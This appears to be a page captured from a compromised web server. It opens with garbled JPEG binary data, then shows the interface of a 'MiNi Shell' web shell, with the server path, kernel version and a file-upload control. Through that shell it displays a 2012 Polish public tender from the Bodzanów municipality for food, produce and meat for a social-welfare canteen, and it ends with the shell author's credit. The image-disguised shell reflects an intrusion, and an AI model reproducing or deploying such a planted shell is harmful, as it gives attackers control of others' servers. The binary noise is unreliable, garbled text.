JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120727/273022-N-2012.html

<p class="kh_header"><b>Bodzanów: Wybór wykonawcy na dostawę do stołówki dla podopiecznych GOPS-u w Bodzanowie:
zadanie nr 1 -  artykułów spożywczych
zadanie nr 2 - owoców i warzyw gat. I
zadanie nr 3 - mięsa i wędlin</b><br>
<b>Numer ogłoszenia: 273022 - 2012; data zamieszczenia: 27.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Bodzanów , ul. Bankowa 7, 09-470 Bodzanów, woj. mazowieckie, tel. 24 2607006 w. 30, faks 24 2607065.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bodzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór wykonawcy na dostawę do stołówki dla podopiecznych GOPS-u w Bodzanowie:
zadanie nr 1 -  artykułów spożywczych
zadanie nr 2 - owoców i warzyw gat. I
zadanie nr 3 - mięsa i wędlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 
	Art. Spożywcze		
1.Mąka pszenna typu Szymanowska 1 kg	kg	150
2. Mąka pszenna typu Wrocławska 1 kg	kg	60 
3.Mąka pszenna typu Krupczatka 1kg	kg	50 
4.Ryż sypki 1kg	kg	150 
5.Makaron (świderki) 	kg	250 
6.Kasza jęczmienna 1 kg	kg	20 
7.Koncentrat pomidorowy 1litrowy 30% 	szt.	   150 
8.Przecier ogórkowy na zupę ok. 300-330 ml	szt.	50 
9.Olej uniwersalny typu Kujawski 3 litr butelka	szt.	50 
10.Margaryna typu Kasia - kostka 200gr	kg	5 
11.Masło roślinne kostka - 200gr	kg	5 
12.Śmietana 18% (do zupy) - 200ml	szt. 	1000
13.Ser biały półtłusty	kg	250
14.Ser typu edamski (twardy)	kg	5
15.Mleko świeże 3,2%	l	180

Termin realizacji usługi - od dnia 01 października 2012r. do dnia 14 czerwca 2013r.
Dowóz do kuchni GOPS, ul. Poniatowskiego 1 w Bodzanowie  - Dom Parafialny- wg potrzeb Zamawiającego.
CPV - 15 80 00 00 - 6 - Różne produkty spożywcze

Zadanie 2

	Warzywa i Owoce		
1.Porcje włoszczyzny 	szt.	250
2. Marchew 	kg	30 
3.Pietruszka	kg	20 
4.Seler	kg	10 
5.Por	szt.	100 
6.Kapusta biała główki	kg	300 
7.Kapusta kiszona	kg	   100 
8.Ziemniaki białe	kg	2000 
9.Buraki czerwone	kg	30 
10.Jabłka typu lobo	kg	300 

Termin realizacji usługi - od dnia 01 października 2012r. do dnia 14 czerwca 2013r.
Dowóz do kuchni GOPS, ul. Poniatowskiego 1 w Bodzanowie -Dom Parafialny - wg potrzeb Zamawiającego.
CPV - 15 30 00 00 - 1 - Owoce, warzywa i podobne produkty

Zadanie 3

	Mięso i wędliny		
1.Mięso mielone wieprzowe gat. I 	kg	150
2. Mięso mielone drobiowe gat. I 	kg	50 
3.Mięso mielone wieprzowo - wołowe gat. I 	kg	20 
4.Porcje drobiowe rosołowe 	kg	150 
5.Ćwiartki z kurczaka 	kg	100 
6.Mięso gulaszowe wieprzowe gat. I 	kg	50 
7.Kiełbasa  zwyczajna gat. I 	kg	   30 
8.Kiełbasa cienka typu Śląska, Podwawelska	kg	50 
9.Mortadela	kg	30 
10.Parówki drobiowe cienkie 	kg	150 
11.Parówki wieprzowe cienkie 	kg	200 
12.Parówkowa gat. I 	kg	50
13.Boczek wędzony gat. I	kg	20

Termin realizacji usługi - od dnia 01 października 2012r. do dnia 14 czerwca 2013r.
Dowóz do kuchni GOPS, ul. Poniatowskiego 1 w Bodzanowie  -Dom Parafialny-wg potrzeb Zamawiającego.
CPV - 15 10 00 00 - 9 - produkty zwierzęce, mięso i produkty mięsne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.30.00.00-1, 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty załączony do SIWZ - wg wzoru załącznik nr 1 do SIWZ
2. Wypełniony formularz cenowy załączony do SIWZ - wg wzoru załącznik nr 1a do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bodzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Bodzanowie, ul. Bankowa 7, 09-470 Bodzanów, (p. Kierownika GOPS).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2012 godzina 15:00, miejsce: Urząd Gminy w Bodzanowie, ul. Bankowa 7, 09-470 Bodzanów - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wybór wykonawcy na dostawę do stołówki dla podopiecznych GOPS-u w Bodzanowie:
zadanie nr 1 -  artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 

	Art. Spożywcze		
1.Mąka pszenna typu Szymanowska 1 kg	kg	150
2. Mąka pszenna typu Wrocławska 1 kg	kg	60 
3.Mąka pszenna typu Krupczatka 1kg	kg	50 
4.Ryż sypki 1kg	kg	150 
5.Makaron (świderki) 	kg	250 
6.Kasza jęczmienna 1 kg	kg	20 
7.Koncentrat pomidorowy 1litrowy 30% 	szt.	   150 
8.Przecier ogórkowy na zupę ok. 300-330 ml	szt.	50 
9.Olej uniwersalny typu Kujawski 3 litr butelka	szt.	50 
10.Margaryna typu Kasia - kostka 200gr	kg	5 
11.Masło roślinne kostka - 200gr	kg	5 
12.Śmietana 18% (do zupy) - 200ml	szt. 	1000
13.Ser biały półtłusty	kg	250
14.Ser typu edamski (twardy)	kg	5
15.Mleko świeże 3,2%	l	180

Termin realizacji usługi - od dnia 01 października 2012r. do dnia 14 czerwca 2013r.
Dowóz do kuchni GOPS, ul. Poniatowskiego 1 w Bodzanowie  - Dom Parafialny- wg potrzeb Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wybór wykonawcy na dostawę do stołówki dla podopiecznych GOPS-u w Bodzanowie:
zadanie nr 2 - owoców i warzyw gat. I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2

	Warzywa i Owoce		
1.Porcje włoszczyzny 	szt.	250
2. Marchew 	kg	30 
3.Pietruszka	kg	20 
4.Seler	kg	10 
5.Por	szt.	100 
6.Kapusta biała główki	kg	300 
7.Kapusta kiszona	kg	   100 
8.Ziemniaki białe	kg	2000 
9.Buraki czerwone	kg	30 
10.Jabłka typu lobo	kg	300 

Termin realizacji usługi - od dnia 01 października 2012r. do dnia 14 czerwca 2013r.
Dowóz do kuchni GOPS, ul. Poniatowskiego 1 w Bodzanowie  -Dom Parafialny - wg potrzeb Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wybór wykonawcy na dostawę do stołówki dla podopiecznych GOPS-u w Bodzanowie:
zadanie nr 3 - mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3

	Mięso i wędliny		
1.Mięso mielone wieprzowe gat. I 	kg	150
2. Mięso mielone drobiowe gat. I 	kg	50 
3.Mięso mielone wieprzowo - wołowe gat. I 	kg	20 
4.Porcje drobiowe rosołowe 	kg	150 
5.Ćwiartki z kurczaka 	kg	100 
6.Mięso gulaszowe wieprzowe gat. I 	kg	50 
7.Kiełbasa  zwyczajna gat. I 	kg	   30 
8.Kiełbasa cienka typu Śląska, Podwawelska	kg	50 
9.Mortadela	kg	30 
10.Parówki drobiowe cienkie 	kg	150 
11.Parówki wieprzowe cienkie 	kg	200 
12.Parówkowa gat. I 	kg	50
13.Boczek wędzony gat. I	kg	20

Termin realizacji usługi - od dnia 01 października 2012r. do dnia 14 czerwca 2013r.
Dowóz do kuchni GOPS, ul. Poniatowskiego 1 w Bodzanowie  - Dom Parafialny - wg potrzeb Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com